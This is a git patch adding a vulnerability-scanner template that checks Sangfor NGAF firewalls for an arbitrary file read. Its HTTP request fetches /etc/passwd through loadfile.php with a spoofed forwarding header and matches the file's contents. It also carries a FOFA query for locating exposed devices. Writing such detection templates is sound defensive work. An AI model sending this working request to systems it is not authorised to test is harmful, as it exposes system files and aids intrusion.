From 22a07ca5832c47c828d913b9d584479799c05b67 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 5 Oct 2023 17:41:00 +0530
Subject: [PATCH] Create sangfor-ngaf-lfi.yaml

---
 .../sangfor/sangfor-ngaf-lfi.yaml             | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml

diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
new file mode 100644
index 00000000000..88b737607fe
--- /dev/null
+++ b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
@@ -0,0 +1,40 @@
+id: sangfor-nextgen-lfi
+
+info:
+  name: Sangfor Next Gen Application Firewall - Arbitary File Read
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
+  reference:
+    - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="SANGFOR | NGAF"
+  tags: sangfor,lfi
+
+http:
+  - raw:
+      - |
+        GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+        Host: {{Hostname}}
+        y-forwarded-for: 127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: header
+        words:
+          - 'filename="passwd"'
+          - 'application/octet-stream'
+        condition: and
+
+      - type: status
+        status:
+          - 200